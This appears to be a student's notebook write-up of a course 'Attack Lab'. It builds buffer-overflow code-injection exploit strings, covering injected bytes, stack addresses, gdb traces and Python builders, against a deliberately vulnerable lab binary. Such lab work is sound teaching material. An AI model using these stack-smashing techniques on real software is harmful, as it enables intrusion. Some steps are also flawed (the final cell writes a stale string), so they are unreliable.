# CS33: Attack Lab

## Phase 2

### Overview

The key technique of exploitation in phase 2 is code injection, which can be carried out in two steps. First, we will write the binary code instructions into the runtime stack. Then, by overflowing the runtime stack, we overwrite the the return address of the current stack and change it into the starting address of the injected code. This way, when the current procedure call is finished, the program will restart at the overwritten return address, which is the injected code.

In this phase, what we want to achieve with the injection code is to call another procedure named `touch2` with cache as the argument. So, in the injected code, we need to first move the desired argument value for `touch2` into `%rdi%`, the register that by convention holds the first argument for procedure call, and then find some way to call the procedure `touch2`. Because the lab requirement forbids us from using `jmp` or `call` in our injected code, we need to use a combination of stack overflow and `ret` to call `touch2`. 

First, we will place the address of `touch2` in the exploit string. Then, in the injected code, we will manipulate the stack pointer to have it pointing to the injected address of `touch2`. This way, when we call `ret` in the injected code, the stack will pop the address of `touch2` and have the program restart there. as desired.

### Execution

```asm
Dump of assembler code for function getbuf:
   0x0000000000401847 <+0>:	sub    $0x28,%rsp
   0x000000000040184b <+4>:	mov    %rsp,%rdi
   0x000000000040184e <+7>:	callq  0x401a80 <Gets>
   0x0000000000401853 <+12>:	mov    $0x1,%eax
   0x0000000000401858 <+17>:	add    $0x28,%rsp
   0x000000000040185c <+21>:	retq
```

Similar to phase 1, because the stack frame is of size `0x28` or `40`, we need to supply 40-byte long exploit string to overflow the stack and then rewrite the return address with another 8 bytes. However, this time, we also need to include the injected code in the first 40 bytes, so we cannot just simply pad them with 0.

To get started, we will write down the assembly code we want to inject. The objective of this phase is to call procedure `touch2` with argument `cookie`, whose value is specified in the file `cookie.txt`.

In [1]:
!cat cookie.txt

0x55ca9f6d


In [2]:
!pygmentize phase2.s

[32mmovl[39;49;00m  [31m$0x55ca9f6d[39;49;00m, [31m%edi[39;49;00m
[32msub[39;49;00m   [31m$0x10[39;49;00m, [31m%rsp[39;49;00m
[32mret[39;49;00m


Remark that here we need to subtract the stack pointer by two bytes, `0x10`, to have it point to the 8 byte immediately preceding the return address of the `getbuf` call. Why? Because when the computer is running through our injected code, it has already returned from `getbuf` call, thereby incrementing the stack by `0x8` above the return address of `getbuf`.

Then, we need to convert it into byte code. One way to do it is to first assemble it into object code and then use objdump to get the byte code.

In [3]:
!gcc -c phase2.s -o phase2.o

In [4]:
!objdump -d phase2.o > phase2.d

In [5]:
!cat phase2.d


phase2.o:	file format Mach-O 64-bit x86-64

Disassembly of section __TEXT,__text:
__text:
       0:	bf 6d 9f ca 55 	movl	$1439342445, %edi
       5:	48 83 ec 10 	subq	$16, %rsp
       9:	c3 	retq


So the byte representation of the injected code will be:

```
bf 6d 9f ca 55 48 83 ec 10 c3
```

Based on the design outlined in the Overview, we will pad the exploit string with 00 until the last 16 bytes; the first 8 bytes will be the address of `touch2` and the second 8 will be the address of the injected code, which is simply the address of the buffer. So, the exploit string will be:

```
bf 6d 9f ca 55 48 83 ec 10 c3 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 ADDRESS_OF_TOUCH2 ADDRESS_OF_BUFFER
```

We can find the address of `touch2` by simply examining the disassembled object code, `ctarget.s`.

In [6]:
!cat ctarget.s | grep -A 1 touch2

[01;31m[Ktouch2[m[K:
  401889:	48 83 ec 08 	subq	$8, %rsp
--
  40189f:	74 23 	je	35 <[01;31m[Ktouch2[m[K+0x3B>
  4018a1:	bf 00 31 40 00 	movl	$4206848, %edi
--
  4018dd:	eb db 	jmp	-37 <[01;31m[Ktouch2[m[K+0x31>



The line immediately after `touch2:` declaration is the address of the procedure. Padded to 8 bytes, the address is `0x0000000000401889`. However, we still need to format the address to fit the Little Endian byte order and separate each byte with a space. I wrote a convenient Python procedure `toLittleEndian` to carry out the task.

In [7]:
import sys

def toLittleEndian(word):
    result = '';
    for i in range(0, len(word), 2):
      result = word[i : i + 2] + ' ' + result
    return result

In [8]:
address_of_touch2 = toLittleEndian('0000000000401889')
address_of_touch2

'89 18 40 00 00 00 00 00 '

Therefore, `ADDRESS_OF_TOUCH2` is `89 18 40 00 00 00 00 00`.

The only thing remains is to find the address of the buffer, which cannot be found by just looking into the disassembled code because it is allocated at run time. So, we are going to run the code in `gdb` to find it out. Below is the result of running gdb in the school's designated lab server:

```
(gdb) break getbuf
Breakpoint 1 at 0x401847: file buf.c, line 12.
(gdb) run
Starting program: /w/home.13/class/classtzh/CS33/AttackLab/target40/ctarget
Cookie: 0x55ca9f6d

Breakpoint 1, getbuf () at buf.c:12
12	buf.c: No such file or directory.
(gdb) disassemble
Dump of assembler code for function getbuf:
=> 0x0000000000401847 <+0>:	sub    $0x28,%rsp
   0x000000000040184b <+4>:	mov    %rsp,%rdi
   0x000000000040184e <+7>:	callq  0x401a80 <Gets>
   0x0000000000401853 <+12>:	mov    $0x1,%eax
   0x0000000000401858 <+17>:	add    $0x28,%rsp
   0x000000000040185c <+21>:	retq
End of assembler dump.
(gdb) stepi
14	in buf.c
(gdb) disassemble
Dump of assembler code for function getbuf:
   0x0000000000401847 <+0>:	sub    $0x28,%rsp
=> 0x000000000040184b <+4>:	mov    %rsp,%rdi
   0x000000000040184e <+7>:	callq  0x401a80 <Gets>
   0x0000000000401853 <+12>:	mov    $0x1,%eax
   0x0000000000401858 <+17>:	add    $0x28,%rsp
   0x000000000040185c <+21>:	retq
End of assembler dump.
(gdb) print /x $rsp
$1 = 0x556647a8
```

We can see that the address of the buffer is `0x556647a8`, which, padded to 8 byte, is `0x00000000556647a8`. Convert it again to Little Endian with our Python script.

In [9]:
buffer_address = toLittleEndian('00000000556647a8')
buffer_address

'a8 47 66 55 00 00 00 00 '

Therefore, ADDRESS_OF_BUFFER is a8 47 66 55 00 00 00 00.

Since we now have all the puzzle pieces, we can complete the exploit string, which is:

```
bf 6d 9f ca 55 48 83 ec 10 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 89 18 40 00 00 00 00 00 a8 47 66 55 00 00 00 00
```

We then tested it on the server. It worked.

```
# ./hex2raw < phase2.txt | ./ctarget
Cookie: 0x55ca9f6d
Type string:Touch2!: You called touch2(0x55ca9f6d)
Valid solution for level 2 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
```

## Phase 3

This phase, again, is about code injection attack. Unlike Phase 2, for this phase we need to pass a string that matches the cookie as argument to procedure `touch3`.

```c
/* Compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval) {
  char cbuf[110];
  /* Make position of check string unpredictable */
  char *s = cbuf + random() % 100;
  sprintf(s, "%.8x", val);
  return strncmp(sval, s, 9) == 0;
}

void touch3(char *sval)
{
    vlevel = 3;       /* Part of validation protocol */
    if (hexmatch(cookie, sval)) {
        printf("Touch3!: You called touch3(\"%s\")\n", sval);
        validate(3);
    } else {
        printf("Misfire: You called touch3(\"%s\")\n", sval);
        fail(3); 
    }
    exit(0); 
}
```

The `hexmatch` procedure given to check the string input seems complicated. However, all it is doing is to randomize its buffer's location on the stack it stores the `val` into, so that we cannot pass the check by simply guessing the location of the buffer and writing into it by overflwoing the stack. As long as we pass the `cookie` value in the format of byte string into `hexmatch`, we will be able to pass the check.

So first, we need the byte string representation of `cookie`, `55ca9f6d`. We 

In [41]:
cookie = '55ca9f6d'
def build_cookie_str(cookie):
    return ''.join([hex(ord(char))[2:] + ' ' for char in cookie]) + '00'
cookie_str = build_cookie_str(cookie)
cookie_str

'35 35 63 61 39 66 36 64 00'

Note that we need to add a null character to the string to indicate its ending.

Now we have the cookie representation at hand, we will proceed to layout what we need to inject on the stack. 

```
ADDRESS_OF_TOUCH3
OVERWRITE_RETURN_ADDRESS
PADDING
COOKIE_STRING
RET (call touch3)
SET_RDI_TO_THE_ADDRESS_OF_COOKIE_STRING
```

What makes this phase tricky is that the two procedures, `hexmatch` and `touch3`, will actually push onto the stack when called. So if we accidentally put our injected code in the locations these two procedures push onto, then our code will be overwritten. To make it safe, we are going to write all our codes as low on the stack frame as possible. The lowest we can get is the `buffer`. So we will just write everything together starting at the location of `buffer`.

Here is a prototype of the machine codes we want to inject:

```asm
movq $ADDRESS_OF_COOKIE_STRING, %rdi
ret
```

In our layout, the cookie string is put right above the injected code on the stack. As a result, in order to get its address, we must first know the exact length of the injected code after assembling. However, the length of the injected code actually depends on the address of cookie string. For example, if we disassemble

```asm
movq $0x0000000000000000, %rdi
ret
```

the result will be

```
48 c7 c7 00 00 00 00 	movq	$0, %rdi
c3 	retq
```

However, if we disassemble

```asm
movq $0x0123456789abcdef, %rdi
ret
```

the result will be 

```asm
48 bf ef cd ab 89 67 45 23 01 	movabsq	$81985529216486895, %rdi
c3 	retq
```

The length of the disassembled codes are clearly different. So we need to be very careful what we use as the place holder for the address. Here, we will use the address of the buffer, `0x556647a8`, which will be very close to the actual address, as the place holder.

In [12]:
!pygmentize phase3_tmp.s

[32mmovq[39;49;00m [31m$0x556647a8[39;49;00m, [31m%rdi[39;49;00m
[32mret[39;49;00m


In [13]:
!gcc -c phase3_tmp.s -o phase3.o

In [14]:
!objdump -d phase3.o > phase3.d

In [15]:
!cat phase3.d


phase3.o:	file format Mach-O 64-bit x86-64

Disassembly of section __TEXT,__text:
__text:
       0:	48 c7 c7 a8 47 66 55 	movq	$1432766376, %rdi
       7:	c3 	retq


In [16]:
len('48 c7 c7 a8 47 66 55 c3'.split())

8

So the byte representation of the injected code will be of length `8`. Adding `8` to the address of the buffer,

In [17]:
cookie_string_address = hex(0x556647a8 + 8)
cookie_string_address

'0x556647b0'

So the address of the cookie string in out stack layout will be `0x556647b0`. We will then change the address holder in `phase3.s` into `0x556647b0`. 

In [18]:
!pygmentize phase3.s

[32mmovq[39;49;00m [31m$0x556647b0[39;49;00m, [31m%rdi[39;49;00m
[32mret[39;49;00m


In [19]:
!gcc -c phase3.s -o phase3.o && objdump -d phase3.o > phase3.d && cat phase3.d


phase3.o:	file format Mach-O 64-bit x86-64

Disassembly of section __TEXT,__text:
__text:
       0:	48 c7 c7 b0 47 66 55 	movq	$1432766384, %rdi
       7:	c3 	retq


Observe that the length of the instruction does not change. Thus, we now can be certain that the byte code representation of the injected code will be:

```
48 c7 c7 b0 47 66 55 c3
```

In [20]:
injected_code = '48 c7 c7 b0 47 66 55 c3'

In [21]:
exploit_string_build = injected_code + ' ' + cookie_str
exploit_string_build

'48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00'

Now we need to add the padding to the exploit string. Because the stack frame is of size 40, to start overwriting return address, we need to first make the string of 40 bytes long.

In [22]:
exploit_string_build = exploit_string_build + ' ' + (40 - len(exploit_string_build.split())) * '00 '
exploit_string_build

'48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 '

Now we can add the starting address of the injected code, which is the address of the buffer, to the exploit string. It will overwrite the return address.

In [23]:
exploit_string_build = exploit_string_build + buffer_address
exploit_string_build

'48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 '

The last piece of the puzzle will be the address of `touch3`. We can easily find that out by searching through `ctarget.s`.

In [24]:
!cat ctarget.s | grep -A 1 touch3

[01;31m[Ktouch3[m[K:
  40195e:	53 	pushq	%rbx
--
  40197c:	74 26 	je	38 <[01;31m[Ktouch3[m[K+0x46>
  40197e:	48 89 de 	movq	%rbx, %rsi
--
  4019c0:	eb d8 	jmp	-40 <[01;31m[Ktouch3[m[K+0x3C>



So the address of `touch3` is `0x000000000040195e`.

In [25]:
address_of_touch3 = toLittleEndian('000000000040195e')
address_of_touch3

'5e 19 40 00 00 00 00 00 '

Adding it to the existing pieces of exploit string, we shall get the final build.

In [26]:
exploit_string_build += address_of_touch3
exploit_string_build = exploit_string_build.strip()
exploit_string_build

'48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 5e 19 40 00 00 00 00 00'

Here we sum up how we build the exploit string:

In [39]:
def build_exploit_string(injected_code, cookie_str, buffer_address, address_of_touch3):
    result = injected_code + ' ' + cookie_str
    # Add Padding
    result += ' ' + (40 - len(result.split())) * '00 '    
    result += buffer_address
    result += address_of_touch3
    result = result.strip()
    return result

test = build_exploit_string(injected_code, cookie_str, buffer_address, address_of_touch3)
test

'48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 5e 19 40 00 00 00 00 00'

In [40]:
test == exploit_string_build

True

### Testing

I stored the key into `phase3.txt` and attemped to solve phase 3 with it but failed. There was also a segmentation error. Because the exploit string itself is not long enough to cause the problem, the reason lies somewhere else. It is noted in the lab instruction that "when functions `hexmatch` and `strncmp` are called, they push data onto the stack, overwriting portions of memory that held the buffer used by getbuf". It could be a possible explanation. To figure things out, I decided to use `gdb` to step through the programs.

Here is a tip that might come handy with `gdb`. We can still use redirect in `gdb` interface. Simply type

```bash
run < file_to_redirect
```

However, we cannot run another binary in the interface. So, we need to first generate a text file that can be redirected as the input. (Because `hex2raw` is compiled for SEASNET server and I cannot figure out a way to run Jupyter Notebook there, I will just put the command here in txet)

```bash
./hex2raw phase3.txt > phase3_raw.txt
```

After debugging in GDB, I found that the segmentation fault occured when we are returning from `getbuf`. After further examination, I found that `$rsp` does not hold the addres it should hold. So I looked into `phase3.txt`.

In [27]:
!cat phase3.txt

48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 5e 19 40 00 00 00 00 00


Somehow when I am copying the address from the cell above into my VIM editor in the terminal, the first two bytes disappeared. I have long been aware that copying into the terminal can lead to unpredictable behavior as the integration is not perfect, but this is the first time I paid the real price.

To avoid future incidences like this, I will refrain from any copy/paste into/out of terminal. If unavoidable, I will double check the result. In this case, we can simply write into the text file with Python right in the notebook and avoid such frail behavior.

In [28]:
file = open("phase3.txt", 'w')
file.write(exploit_string_build + '\n')
file.close()

In [29]:
cat phase3.txt

48 c7 c7 b0 47 66 55 c3 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 5e 19 40 00 00 00 00 00


We went back to the server and experimented with the new key. Cheers. We solved the segmentation fault. However, we got another problem.

```
Type string:Misfire: You called touch3("55ca9f6d�GfU")
```

Apparently the string argument turned out to be not quite what we want it to be. It should be:

In [30]:
cookie

'55ca9f6d'

It seems that the string did not terminate at its end. However, I did not forget to include the null character at the end.

In [31]:
cookie_str

'35 35 63 61 39 66 36 64 00'

So I could not really figure out what went wrong by just looking at my key. It looks perfectly fine. Again, I need to rely on `gdb` again.

I set a breakpoint at `touch3`, and when it is called, I checked its argument with `x/s $rdi`, which prints out the first argument in string format. The result is:

```
(gdb) x/s $rdi
0x556647b0:	"55ca9f6d"
```

Nothing wrong with it as well. We could only suspect that the argument needs to be `0x55ca9f6d` instead of `55ca9f6d`.

In [42]:
cookie_str = build_cookie_str('0x55ca9f6d')
cookie_str

'30 78 35 35 63 61 39 66 36 64 00'

In [43]:
exploit_string = build_exploit_string(injected_code, cookie_str, buffer_address, address_of_touch3)
exploit_string

'48 c7 c7 b0 47 66 55 c3 30 78 35 35 63 61 39 66 36 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 47 66 55 00 00 00 00 5e 19 40 00 00 00 00 00'

In [44]:
file = open("phase3.txt", 'w')
file.write(exploit_string_build + '\n')
file.close()